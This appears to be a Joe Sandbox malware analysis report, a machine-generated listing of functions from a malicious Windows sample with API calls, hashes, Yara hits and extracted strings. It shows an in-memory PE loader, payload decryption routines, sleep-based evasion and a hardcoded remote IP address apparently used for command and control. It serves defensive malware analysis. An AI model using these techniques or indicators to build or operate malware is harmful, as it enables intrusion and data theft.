                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: 43bafc9d913032364e66eb76556220aff11c3ffb76751d3d3a00cc89f2821bfa
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: 3ED0123114512877D7002A94DC0DBCD7B1CDF05B62F108021FB0DD9080C770954047E5
                    Function 00605DF2 Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1380 605df2-609633 LoadLibraryA 1383 609654-60994f 1380->1383
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmp, Offset: 00603000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_603000_file.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: b7ac928487658b8f3f8aaea6754729709319a5004d6850eeddc60fd3a76e234a
                    • Instruction ID: a947152b9f66a0b3fd12702b7aa342d05c8d836f6efe1d9095b4b76eca72415a
                    • Opcode Fuzzy Hash: b7ac928487658b8f3f8aaea6754729709319a5004d6850eeddc60fd3a76e234a
                    • Instruction Fuzzy Hash: E9116DB291C220AFD305AF28C84567AB7E9EF58720F1A482DEAC9D7340E2315C509BD3
                    Function 0070681F Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1397 70681f-706856 1401 706873-706877 1397->1401 1402 706857-70685c 1397->1402 1403 70688d-7068a9 VirtualProtect call 7068ac 1401->1403 1404 70687d 1401->1404 1402->1401 1404->1403
                    APIs
                    • VirtualProtect.KERNEL32(?,00706802,00000004), ref: 0070689B
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000706000.00000040.00000001.01000000.00000003.sdmp, Offset: 00706000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_706000_file.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 441b078b58ba90b658bc68aca70dc28478d87110c4cd5696fab324390f46118a
                    • Instruction ID: e5fc2831fdd356470ea524ab0c1703fa2738362d58fc0d70fe36ec8eefc9282a
                    • Opcode Fuzzy Hash: 441b078b58ba90b658bc68aca70dc28478d87110c4cd5696fab324390f46118a
                    • Instruction Fuzzy Hash: 4AF0A072908155FFE710CF109930AAE3BE4EB45720F34C606F806835C1C2289C65A625
                    Function 00706888 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1407 706888-7068a3 VirtualProtect 1408 7068a9 1407->1408 1409 7068a4 call 7068ac 1407->1409 1409->1408
                    APIs
                    • VirtualProtect.KERNEL32(?,00706802,00000004), ref: 0070689B
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000706000.00000040.00000001.01000000.00000003.sdmp, Offset: 00706000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_706000_file.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 7823b62450591213b8f6a08348e639a68a2700acade68dba85eb105d53817ac8
                    • Instruction ID: a65902617783ac2e57b6638db24795b00ab0a47438640e92303edb50415b6834
                    • Opcode Fuzzy Hash: 7823b62450591213b8f6a08348e639a68a2700acade68dba85eb105d53817ac8
                    • Instruction Fuzzy Hash: 7DD0127245826DADDF11DF5448157CE7E24EB19700F148144FC0501992D6661824C705
                    Function 047A8123 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 047A8174
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101686121.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: b7ee4685b3560880c722a87af921d37dd854d14b97f1e34b5c59a131e3db5e88
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: B5113C79A00208EFDB01DF98C989E98BBF5EF08350F058094F9489B361D371EA50DF81
                    Function 00706F6A Relevance: 1.3, APIs: 1, Instructions: 30sleepCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000706000.00000040.00000001.01000000.00000003.sdmp, Offset: 00706000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_706000_file.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 35438392d5f74c6afd304e3771089eb33d598f1ed56aa19d2479f0a468280af7
                    • Instruction ID: 0e2640394576cb740f1f3895bb9228d68199dc944fe15f2cba5b7b3438a78847
                    • Opcode Fuzzy Hash: 35438392d5f74c6afd304e3771089eb33d598f1ed56aa19d2479f0a468280af7
                    • Instruction Fuzzy Hash: EBF0272190D545CED3082F25456417DFFE5AF02300FB54BAFD4C19A2D2D1299989D302
                    Function 00706FC3 Relevance: 1.3, APIs: 1, Instructions: 29sleepCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000706000.00000040.00000001.01000000.00000003.sdmp, Offset: 00706000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_706000_file.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: d367178d4dd3184ec2ace5532265be73a72373fdaa781de8a491b2fdc268bb30
                    • Instruction ID: 376118c96778d3a7b4bf910704dfb80aeac680cac646707968ad09269c396678
                    • Opcode Fuzzy Hash: d367178d4dd3184ec2ace5532265be73a72373fdaa781de8a491b2fdc268bb30
                    • Instruction Fuzzy Hash: ECF0BEF5A0C646EFE3096F388410379BFE0FB95301F214A6A84C19A1C3E2389959DB02

                    Non-executed Functions

                    Function 04953FA7 Relevance: 45.6, APIs: 20, Strings: 5, Instructions: 1839sleepcomCOMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04954011
                    • Sleep.KERNEL32(000003E8), ref: 049541A9
                    • __Init_thread_footer.LIBCMT ref: 0495477E
                    • __Init_thread_footer.LIBCMT ref: 04954944
                    • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04956D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04954B4E
                    • __Init_thread_footer.LIBCMT ref: 04954BDC
                    • __Init_thread_footer.LIBCMT ref: 04954E45
                    • CoInitialize.OLE32(00000000), ref: 04954EC6
                    • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04954EE1
                    • __Init_thread_footer.LIBCMT ref: 04955344
                    • Sleep.KERNEL32(00000BB8,00000000,?,04956D08,0041D8D0,0042DBDC,0042DBDD), ref: 0495555C
                    • __Init_thread_footer.LIBCMT ref: 04955652
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04956D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04954F4F
                      • Part of subcall function 04960A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04955D06,00000000,0042C014), ref: 04960A9E
                      • Part of subcall function 04960A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04960ABD
                    • __Init_thread_footer.LIBCMT ref: 049542AD
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      • Part of subcall function 04952487: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 049524BD
                      • Part of subcall function 04952487: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 049524DE
                      • Part of subcall function 04952487: CloseHandle.KERNEL32(00000000), ref: 049524E5
                    • __Init_thread_footer.LIBCMT ref: 04954489
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
                    • String ID: 185.156.72.65$O@K\$Y@BA$ZK\.$rmBK
                    • API String ID: 529012138-2214808123
                    • Opcode ID: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                    • Instruction ID: 175f9b9b8e5e0ed6967ab2b4efcc17d5098a5b891e341e984bef65d0d0da54a3
                    • Opcode Fuzzy Hash: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                    • Instruction Fuzzy Hash: 52F2D1B0D042549FEB24CF24DC48BADBBB4AF44308F6442E8E8096B2A1D775BAC5CF55
                    Function 00402EE0 Relevance: 33.7, APIs: 11, Strings: 8, Instructions: 454COMMON
                    Download Yara Rule
                    APIs
                    • SetLastError.KERNEL32(0000000D), ref: 00402F02
                    • SetLastError.KERNEL32(000000C1), ref: 00402F44
                    Strings
                    • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FB3
                    • Size is not valid!, xrefs: 00402F08
                    • DOS header size is not valid!, xrefs: 00402F71
                    • ERROR_OUTOFMEMORY!, xrefs: 00403062
                    • Section alignment invalid!, xrefs: 00402FC7
                    • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FA1
                    • DOS header is not valid!, xrefs: 00402F32
                    • alignedImageSize != AlignValueUp!, xrefs: 0040302C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast
                    • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                    • API String ID: 1452528299-2436911586
                    • Opcode ID: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                    • Instruction ID: feefb59cb084f329bf9f2ee3fcaf904be4f7c95626e3fbc9d9f9d2488596d2a7
                    • Opcode Fuzzy Hash: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                    • Instruction Fuzzy Hash: C3F1AC71B00205ABCB10CF69D985BAAB7B4BF48705F14407AE909EB6C1D779ED11CB98
                    Function 004035D0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,73BDA22C), ref: 00403650
                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403674
                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036DE
                    • GetLastError.KERNEL32 ref: 004036E8
                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403710
                    • GetLastError.KERNEL32 ref: 0040371A
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040372A
                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037EC
                    • CryptDestroyKey.ADVAPI32(?), ref: 0040385E
                    Strings
                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040362C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                    • API String ID: 3761881897-63410773
                    • Opcode ID: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                    • Instruction ID: 2781db946ec69ebb5a82e2500c6cd73aae13b8bfd69ebbb4ddbc14150c00f762
                    • Opcode Fuzzy Hash: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                    • Instruction Fuzzy Hash: DF819F71A00218AFEF209F25CC45B9ABBB9FF49300F1481BAF50DA7291DB359E858F55
                    Function 04953837 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 049538B7
                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 049538DB
                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04953945
                    • GetLastError.KERNEL32 ref: 0495394F
                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04953977
                    • GetLastError.KERNEL32 ref: 04953981
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04953991
                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04953A53
                    • CryptDestroyKey.ADVAPI32(?), ref: 04953AC5
                    Strings
                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04953893
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                    • API String ID: 3761881897-63410773
                    • Opcode ID: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                    • Instruction ID: 59e7dc52144a8d82591a686373c6de8e293fa5690d896e85b7fa2fa1b2dd26a3
                    • Opcode Fuzzy Hash: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                    • Instruction Fuzzy Hash: FD816171A002189FEB24DF24CC45B9ABBB5EF45340F1481B9E94DE72A1DB31AE858F51
                    Function 00402A50 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113memorywindowCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AF8
                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402B0D
                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402B1B
                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B36
                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B55
                    • LocalFree.KERNEL32(00000000), ref: 00402B62
                    • LocalFree.KERNEL32(?), ref: 00402B67
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                    • String ID: %s: %s$Error protecting memory page
                    • API String ID: 839691724-1484484497
                    • Opcode ID: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                    • Instruction ID: 7115b4f99f47229cfead79ad45df677009e1c347b6b4b41756aa32ea0cb5f428
                    • Opcode Fuzzy Hash: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                    • Instruction Fuzzy Hash: A0311431B00104AFDB10DF58DD45FAAB7A8EF48704F4541BAE905EB2D2DB79AD06CB98
                    Function 049551D7 Relevance: 12.9, APIs: 5, Strings: 2, Instructions: 621sleepCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 04960A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04955D06,00000000,0042C014), ref: 04960A9E
                      • Part of subcall function 04960A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04960ABD
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 04955344
                    • Sleep.KERNEL32(00000BB8,00000000,?,04956D08,0041D8D0,0042DBDC,0042DBDD), ref: 0495555C
                    • __Init_thread_footer.LIBCMT ref: 04955652
                    • Sleep.KERNEL32(000007D0), ref: 049559BC
                    • Sleep.KERNEL32(000007D0), ref: 049559D6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: @BAO$updateSW
                    • API String ID: 3554146954-956047173
                    • Opcode ID: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
                    • Instruction ID: cb50f06d884e9880f0ef62a95241579db65518dc8b806f430c65bdc54610dab4
                    • Opcode Fuzzy Hash: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
                    • Instruction Fuzzy Hash: 953213B0D00254DBEB28DF24CC987ADBBB4AF40314F6542F9D8096B2A6D775AE84CF45
                    Function 005F2856 Relevance: 11.6, Strings: 8, Instructions: 1617COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: 3^u$CGm?$`"7/$m*}W$m*}W$zU5o${!~$0?_
                    • API String ID: 0-2384424205
                    • Opcode ID: afd952f234d7271102e859ae948797e2556ca1c02ebc3e84fc726e221d42abc4
                    • Instruction ID: 4013883d88a73e5b6520d87992df2cebf0f17af308c9d41ba8685c21f9fa18b1
                    • Opcode Fuzzy Hash: afd952f234d7271102e859ae948797e2556ca1c02ebc3e84fc726e221d42abc4
                    • Instruction Fuzzy Hash: 8BB206F3A0C204AFE304AE2DEC8567AB7E9EB94720F16493DE6C5C3344EA7558058797
                    Function 005E33A6 Relevance: 10.4, Strings: 7, Instructions: 1614COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: %D~$6Ny$Zg>$a^k$I5j$RQ{$[J?
                    • API String ID: 0-459213770
                    • Opcode ID: 89f570901e7719fe201a3a117d68dd54fd798d9a09b20606662acf34cb720e90
                    • Instruction ID: 8d1767224888694120d6a5540c9b07b2ad4c33f72c85a3b4b1470dba54728fba
                    • Opcode Fuzzy Hash: 89f570901e7719fe201a3a117d68dd54fd798d9a09b20606662acf34cb720e90
                    • Instruction Fuzzy Hash: 83B20BF3A0C200AFE3146E2DEC8566AFBE9EF94720F1A453DEAC4C7344E67558058697
                    Function 005DAE72 Relevance: 10.3, Strings: 7, Instructions: 1598COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: ![$H\y>$Y>$y);m$|7Y$});m$~-}}
                    • API String ID: 0-232953881
                    • Opcode ID: 3f2f09719ffa588a0edf1897c12d3bd9ee24ca63a5ac162775867729e27907f5
                    • Instruction ID: b762b5635f0e52cb7a0e838c8b5f0c3cd80ae4209574182c4148ca3ef704b97a
                    • Opcode Fuzzy Hash: 3f2f09719ffa588a0edf1897c12d3bd9ee24ca63a5ac162775867729e27907f5
                    • Instruction Fuzzy Hash: 18B2F6F360C204AFE3046E2DEC8567ABBE9EF94320F1A493DE6C4C7744E63598458697
                    Function 005DE398 Relevance: 10.3, Strings: 7, Instructions: 1580COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: sw$(_b}$7PF0$DF7$aFw]$wAi|$~]6
                    • API String ID: 0-1941313218
                    • Opcode ID: b5f01af9574a2a6797d2bde44680c9cba9d7e2a6b77ab59fc755cd842447e046
                    • Instruction ID: a880e8de71da56c785919ca546602f02c341b51a446c823c736bfd513c4acae5
                    • Opcode Fuzzy Hash: b5f01af9574a2a6797d2bde44680c9cba9d7e2a6b77ab59fc755cd842447e046
                    • Instruction Fuzzy Hash: 5EB2F6F360C200AFE704AE29EC8567AFBE9EF94720F16493DEAC5C3744E63558058697
                    Function 0041A346 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                    • Instruction ID: 4ec5cfcd79f9b81e0d104b8321146cba3f0ab1dc6500a030f703b9c7425dc3b2
                    • Opcode Fuzzy Hash: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                    • Instruction Fuzzy Hash: E8D21671E092288FDB65CE28DD807EAB7B5EB44305F1441EAD80DE7240E778AEC58F85
                    Function 005E693F Relevance: 9.1, Strings: 6, Instructions: 1638COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: * y$7}?$kA_l$ms}$4r:$Qo
                    • API String ID: 0-4085897978
                    • Opcode ID: bf61598a84acb3130223c529e839d831bb01eb6edb27b8ce8f3d1a2b25a3f166
                    • Instruction ID: fc6d4b9ca8a0f7999302a354d88e6c925fe07561f431ad9a02f5155270e6ec87
                    • Opcode Fuzzy Hash: bf61598a84acb3130223c529e839d831bb01eb6edb27b8ce8f3d1a2b25a3f166
                    • Instruction Fuzzy Hash: 35B2F9F390C2149FE3046E2DEC8567AFBE9EF94320F1A493DEAC487744EA7558018697
                    Function 00401970 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 293networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401A05
                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401A28
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileInternet$PointerRead
                    • String ID: text
                    • API String ID: 3197321146-999008199
                    • Opcode ID: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                    • Instruction ID: 56e9ac6e571947bcf275884445d614b5348a2aaf1a2f7cc802118cd3fea156c2
                    • Opcode Fuzzy Hash: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                    • Instruction Fuzzy Hash: 10C13970A002189FDB24DF54CC85BE9B7B5EF49304F1041EAE409B72A1DB78AE95CF99
                    Function 005F0D31 Relevance: 7.9, Strings: 5, Instructions: 1674COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: *o$\xj$_~V$`\~$dW}
                    • API String ID: 0-1921357365
                    • Opcode ID: 083c5c5b5ea82cd5ffa2e399e4c3be096146a88cf63fd4682e5a69f895f786f8
                    • Instruction ID: 4bb03231a9a9e63b18b54833a49d383c3477b7e37ac134fccbf049556ab4bdcd
                    • Opcode Fuzzy Hash: 083c5c5b5ea82cd5ffa2e399e4c3be096146a88cf63fd4682e5a69f895f786f8
                    • Instruction Fuzzy Hash: 05B24AF360C2049FE3046E2DEC8567AFBE9EF94720F1A4A3DE6C5C3744E93598058696
                    Function 005ED5B7 Relevance: 7.9, Strings: 5, Instructions: 1663COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: &H'$\{u$un}$l}$l}
                    • API String ID: 0-3622401908
                    • Opcode ID: 4fc0e92ec8c05b8f6eca42772c44f93c7fd9dc5cc04dd4dda4165a25b4bc2374
                    • Instruction ID: da5c9db1c343fe53876a42dd7d99665beed30825b237f2a1ac31962b93e441b5
                    • Opcode Fuzzy Hash: 4fc0e92ec8c05b8f6eca42772c44f93c7fd9dc5cc04dd4dda4165a25b4bc2374
                    • Instruction Fuzzy Hash: 45B227F3A0C2149FE3046E2DEC8567AFBE9EF94620F16493DEAC5C3744EA3558058686
                    Function 005E189C Relevance: 7.9, Strings: 5, Instructions: 1622COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: i\$ +}}$J+?$JaZy$D$|
                    • API String ID: 0-3057257673
                    • Opcode ID: 593fd618999ae1259ec00dcc3c82449d218b6844ccbf74fadebf70f0710ae03e
                    • Instruction ID: 195ae45339d34056b23e3e2e2a29690d35ab20019a2ab0a7fab5c43a051d4008
                    • Opcode Fuzzy Hash: 593fd618999ae1259ec00dcc3c82449d218b6844ccbf74fadebf70f0710ae03e
                    • Instruction Fuzzy Hash: 30B217F360C2009FE304AE2DEC4567ABBE9EFD4720F16893DEAC5C7744EA3558058696
                    Function 005EB99E Relevance: 6.7, Strings: 4, Instructions: 1666COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: S]_$Z#t$rgs$h}
                    • API String ID: 0-3028630491
                    • Opcode ID: 12406312f79cfc89fa1ff026b9006e9479cb960c914d1c568c1c4cd2bcb1dafc
